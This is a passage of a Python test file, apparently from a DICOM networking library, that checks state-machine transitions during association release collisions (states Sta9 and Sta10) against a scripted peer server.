'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta9 + Evt10."""
# Sta9 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta9 + Evt11."""
# Sta9 + Evt11 -> <ignore> -> Sta9
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta9 + Evt12."""
# Sta9 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta9 + Evt13."""
# Sta9 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta9 + Evt14."""
# Sta9 + Evt14 -> AR-9 -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-9: Send A-RELEASE-RP PDU to <remote>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14'
]
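        # (0x06 is the A-RELEASE-RP PDU type, so AR-9 did send the release
        # response to the peer as part of resolving the collision.)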
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta9 + Evt15."""
# Sta9 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta9 + Evt16."""
# Sta9 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta9 + Evt17."""
# Sta9 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta9 + Evt18."""
# Sta9 + Evt18 -> <ignore> -> Sta9
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta9 + Evt19."""
# Sta9 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState10(TestStateBase):
"""Tests for State 10: Release collision acc - awaiting A-RELEASE-RP ."""
def test_evt01(self):
"""Test Sta10 + Evt1."""
# Sta10 + Evt1 -> <ignore> -> Sta10
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
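        # Sta10 is the acceptor side of a release collision, so the association
        # under test is built with get_acceptor_assoc() and the scripted peer
        # opens with a_associate_rq; hence the opening events below are
        # Evt5/Evt6/Evt7 rather than the requestor's Evt1/Evt2/Evt3.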
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta10 + Evt2."""
# Sta10 + Evt2 -> <ignore> -> Sta10
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta10 + Evt3."""
# Sta10 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt3', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta10 + Evt4."""
# Sta10 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt4', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta10 + Evt5."""
# Sta10 + Evt5 -> <ignore> -> Sta10
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta10 + Evt6."""
# Sta10 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt6', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta10 + Evt7."""
# Sta10 + Evt7 -> <ignore> -> Sta10
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta10 + Evt8."""
# Sta10 + Evt8 -> <ignore> -> Sta10
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta10 + Evt9."""
# Sta10 + Evt9 -> <ignore> -> Sta10
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta10 + Evt10."""
# Sta10 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt10', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta10 + Evt11."""
# Sta10 + Evt11 -> <ignore> -> Sta10
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta10 + Evt12."""
# Sta10 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt12', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta10 + Evt13."""
        # Sta10 + Evt13 -> AR-10 -> Sta12
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-10: Issue A-RELEASE (rp) primitive
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13'
]
def test_evt14(self):
"""Test Sta10 + Evt14."""
# Sta10 + Evt14 -> <ignore> -> Sta10
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
